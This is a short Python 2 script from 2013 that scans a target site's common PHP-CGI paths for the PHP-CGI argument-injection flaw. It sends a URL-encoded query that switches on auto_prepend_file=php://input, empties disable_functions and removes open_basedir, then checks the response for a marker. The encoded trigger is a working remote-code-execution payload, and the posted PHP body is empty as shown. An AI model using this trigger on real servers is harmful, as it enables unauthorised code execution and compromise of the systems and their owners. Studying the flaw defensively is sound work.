#!/usr/bin/python2 # Written for /r/netsec # test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths. # infodox - insecurety.net - 2013 # Twitter: @info_dox # Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku # released under WTFPL import requests import sys def scan(target): paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5'] for path in paths: probe(target, path) def probe(target, path): print "[*] Testing Path: %s" %(path) trigger = path + "/?" trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%" trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F" trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F" trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75" trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6" trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64" trigger += "+%64%69%73%61%62%6C%65%5F%66%75%" trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2" trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65" trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+" trigger += "%61%75%74%6F%5F%70%72%65%70%65%6" trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%" trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E" url = target + trigger php = """""" try: haxor = requests.post(url, php) if "44e902a5aa760d79b76e070fa6725386" in haxor.text: print "Exploitable!" except Exception: print "Err, Someshit broke" def main(args): if len(sys.argv) !=2: print "Usage: %s " %(sys.argv[0]) print "Eg: %s http://lol.com" %(sys.argv[0]) sys.exit(0) target = sys.argv[1] print "[*] Target is: %s" %(target) scan(target) if __name__ == "__main__": main(sys.argv) #_EOF infodox 2013